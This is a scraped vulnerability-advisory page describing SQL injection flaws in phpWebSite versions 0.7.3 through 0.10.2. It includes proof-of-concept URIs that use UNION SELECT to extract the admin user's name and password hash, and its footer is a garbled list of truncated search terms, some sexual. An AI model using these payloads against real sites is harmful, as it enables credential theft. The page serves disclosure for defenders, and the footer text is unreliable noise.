about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , PHPWebSite Multiple SQL Injection Vulnerabilities


Title PHPWebSite Multiple SQL Injection Vulnerabilities
Published 2006-03-20-12:00AM
Updated 2006-03-20-10:09PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  DaBDouB-MoSiKaR is credited with the discovery of these vulnerabilities.
Vulnerable  phpWebsite phpWebsite 0.10.2
phpWebsite phpWebsite 0.10.1
Gentoo Linux
phpWebsite phpWebsite 0.10
phpWebsite phpWebsite 0.9.3 4
phpWebsite phpWebsite 0.9.3 3
phpWebsite phpWebsite 0.9.3 2
phpWebsite phpWebsite 0.9.3 1
phpWebsite phpWebsite 0.9.3
phpWebsite phpWebsite 0.8.3
phpWebsite phpWebsite 0.8.2
phpWebsite phpWebsite 0.7.3
Not Vulnerable  
Code   This issue can be exploited using a web client.

The following proof-of-concept URIs are available:

http://www.example.com/friend.php?op=FriendSend&sid=-1%20Union%20select%20name%20From%20users%20where%20uid=1
http://www.example.com/friend.php?op=FriendSend&sid=-1%20Union%20select%20pass%20From%20users%20where%20uid=1
http://www.example.com/article.php?sid=[sql]
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 19 Dec 2009 02:03:55 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.dj152. n...temp/t www.free s IceWarp We ceeblog.cn b...na.com photowoman modules/Ma %2Ballinur www.3pic.o www.yypk.n grilssex hindisex.c php nukr BulletProo 200 /compo www.sex.18 artsex www. Blue pictu XL girls Kaki julia .../Fla/t RGR thrisha ph FJZAOJIA.C flv chathurika Bom sania. Virtual Wa news for c Autos tune summer cum CMS is Fre XXXVIDEOS m...a/bugg amazon/car qq500.qq8t www.cntess suse explo sexylady php-nuke+2 news for c www.slzxj. phpmyadmin www.xiayiz Www play b www ;girls mallika sh beex